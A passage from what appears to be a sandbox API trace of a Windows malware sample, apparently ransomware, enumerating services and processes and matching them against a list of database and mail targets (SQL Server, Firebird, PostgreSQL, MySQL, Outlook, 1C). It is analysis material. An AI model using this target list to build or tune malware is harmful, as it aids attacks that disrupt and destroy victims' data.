[0048.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0048.312] lstrlenW (lpString="SENS") returned 4 [0048.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0048.312] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0048.312] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0048.312] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0048.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0048.312] lstrlenW (lpString="ShellHWDetection") returned 16 [0048.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.312] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.312] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0048.312] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0048.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0048.312] lstrlenW (lpString="Spooler") returned 7 [0048.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0048.312] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0048.312] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0048.312] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0048.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0048.312] lstrlenW (lpString="swprv") returned 5 [0048.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0048.312] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0048.312] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0048.312] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0048.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0048.312] lstrlenW (lpString="SysMain") returned 7 [0048.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0048.312] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0048.312] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0048.312] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0048.312] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0048.312] lstrlenW (lpString="Themes") returned 6 [0048.312] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0048.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0048.313] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0048.313] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0048.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0048.313] lstrlenW (lpString="TrkWks") returned 6 [0048.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0048.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0048.313] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0048.313] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0048.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0048.313] lstrlenW (lpString="UxSms") returned 5 [0048.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0048.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0048.313] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0048.313] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0048.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0048.313] lstrlenW (lpString="VSS") returned 3 [0048.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0048.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0048.313] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0048.313] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0048.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0048.313] lstrlenW (lpString="WdiServiceHost") returned 14 [0048.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.313] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0048.313] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0048.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0048.313] lstrlenW (lpString="WdiSystemHost") returned 13 [0048.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.313] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0048.313] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0048.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0048.313] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0048.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.314] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0048.314] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0048.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0048.314] lstrlenW (lpString="Winmgmt") returned 7 [0048.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0048.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0048.314] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0048.314] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0048.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0048.314] lstrlenW (lpString="WPDBusEnum") returned 10 [0048.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.314] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0048.314] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0048.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0048.314] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x628500 | out: hHeap=0x5d0000) returned 1 [0048.314] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x204 [0048.316] Process32FirstW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0048.317] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0048.317] lstrlenW (lpString="System") returned 6 [0048.317] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0048.318] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0048.318] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0048.318] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0048.318] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0048.318] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0048.318] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0048.318] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0048.318] lstrlenW (lpString="smss.exe") returned 8 [0048.318] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0048.318] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0048.318] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0048.318] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0048.318] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0048.318] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0048.319] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0048.319] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.319] lstrlenW (lpString="csrss.exe") returned 9 [0048.319] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0048.319] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0048.319] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0048.319] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0048.319] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0048.319] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0048.319] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0048.319] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0048.320] lstrlenW (lpString="wininit.exe") returned 11 [0048.320] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0048.320] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0048.320] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0048.320] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.321] lstrlenW (lpString="csrss.exe") returned 9 [0048.321] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0048.322] lstrlenW (lpString="winlogon.exe") returned 12 [0048.322] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0048.322] lstrlenW (lpString="services.exe") returned 12 [0048.322] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0048.323] lstrlenW (lpString="lsass.exe") returned 9 [0048.323] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0048.324] lstrlenW (lpString="lsm.exe") returned 7 [0048.324] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.324] lstrlenW (lpString="svchost.exe") returned 11 [0048.324] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.325] lstrlenW (lpString="svchost.exe") returned 11 [0048.325] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.326] lstrlenW (lpString="svchost.exe") returned 11 [0048.326] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.326] lstrlenW (lpString="svchost.exe") returned 11 [0048.326] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.327] lstrlenW (lpString="svchost.exe") returned 11 [0048.327] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0048.328] lstrlenW (lpString="audiodg.exe") returned 11 [0048.328] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.329] lstrlenW (lpString="svchost.exe") returned 11 [0048.329] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.329] lstrlenW (lpString="svchost.exe") returned 11 [0048.329] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0048.330] lstrlenW (lpString="dwm.exe") returned 7 [0048.330] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0048.331] lstrlenW (lpString="explorer.exe") returned 12 [0048.331] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0048.331] lstrlenW (lpString="spoolsv.exe") returned 11 [0048.331] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.332] lstrlenW (lpString="taskhost.exe") returned 12 [0048.332] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.333] lstrlenW (lpString="svchost.exe") returned 11 [0048.333] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0048.733] lstrlenW (lpString="taskeng.exe") returned 11 [0048.734] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.734] lstrlenW (lpString="taskhost.exe") returned 12 [0048.734] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0048.735] lstrlenW (lpString="carried trinity.exe") returned 19 [0048.735] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0048.736] lstrlenW (lpString="heaven.exe") returned 10 [0048.736] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0048.736] lstrlenW (lpString="dell.exe") returned 8 [0048.736] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0048.737] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0048.737] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0048.738] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0048.738] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0048.739] lstrlenW (lpString="til ear equal.exe") returned 17 [0048.739] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0048.739] lstrlenW (lpString="itunes-bring.exe") returned 16 [0048.739] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0048.740] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0048.740] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0048.741] lstrlenW (lpString="philadelphia.exe") returned 16 [0048.741] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0048.741] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0048.741] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0048.742] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0048.742] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0048.743] lstrlenW (lpString="fraud stuck.exe") returned 15 [0048.743] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0048.743] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0048.743] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0048.744] lstrlenW (lpString="attended.exe") returned 12 [0048.744] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0048.745] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0048.745] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0048.745] lstrlenW (lpString="pan physician.exe") returned 17 [0048.745] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0048.746] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0048.746] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0048.747] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0048.747] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0048.747] lstrlenW (lpString="over-celebrity.exe") returned 18 [0048.747] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0048.748] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0048.748] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0048.749] lstrlenW (lpString="payload.exe") returned 11 [0048.749] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.749] lstrlenW (lpString="cmd.exe") returned 7 [0048.750] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.750] lstrlenW (lpString="conhost.exe") returned 11 [0048.750] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: 